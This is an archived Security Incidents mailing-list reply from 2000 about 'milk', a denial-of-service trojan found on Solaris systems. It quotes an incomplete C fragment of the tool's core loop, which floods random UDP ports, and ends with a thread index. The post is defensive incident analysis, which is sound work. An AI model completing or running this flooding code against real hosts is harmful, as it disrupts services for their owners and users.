Security Incidents mailing list archives

Re: [UPDATE]Dos Trojan on Solaris

From: rslau () USC EDU (Robert Lau)
Date: Wed, 9 Feb 2000 16:54:13 -0800

Please let me know if you find the source code of this "milk" or whatever
name appears to be in your system. Thanks!


As David Brumley said, milk is a simple DoS.  It's a *very* simple program,
something anybody with socket programming experience could whip up in a few
minutes.  milk (along with the ttdb, cmsd, and dt holes) are quite old, we
saw it on our machines last summer.  Its core looks like:

    to.sin_port = htons(rand()%65000);
    if((sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) ==

      perror("ignoring");
      continue;
    }
    if(sendto(sock, buf, size, 0, (struct sockaddr*)(&to), sizeof(to))
==

      perror("ignoring");
    }
    close(sock);
  }

Robert Lau
Information Services Division - Core Services
University of Southern California

Current thread:

Re: UDP to 161, (continued)
- - - Re: UDP to 161 Russell Fulton (Feb 15)
    - Re: Private networks and home.{net|com} Andy Smith (Feb 09)
    - massive unapproved AXFR's and odd rcvd NOTIFY's Paul Wouters (Feb 09)
    - Re: massive unapproved AXFR's and odd rcvd NOTIFY's Francis A. Vidal (Feb 09)
    - [UPDATE]Dos Trojan on Solaris Roderick Padilla (Feb 09)
    - Re: [UPDATE]Dos Trojan on Solaris Ross Mueller (Feb 09)
    - a very strange scan Boris Badenov (Feb 09)
    - Re: a very strange scan Russell Fulton (Feb 10)
    - Possible stacheldraht variant/probe Stephen P. Berry (Feb 09)
    - Re: Possible stacheldraht variant/probe David Brumley (Feb 10)
    - Re: [UPDATE]Dos Trojan on Solaris Robert Lau (Feb 09)
    - Re: Strange traceroute Rob Quinn (Feb 08)
    - vi as a suid Paulo Ribeiro (Feb 08)
  - Re: Strange traceroute Troy Ablan (Feb 05)
    - Re: Strange traceroute Hauke Johannknecht (Feb 08)
  - sendmail vunerability ? E Kelly Bond (Feb 05)
    - Re: sendmail vunerability ? CyberPsychotic (Feb 07)
    - Re: sendmail vunerability ? H D Moore (Feb 10)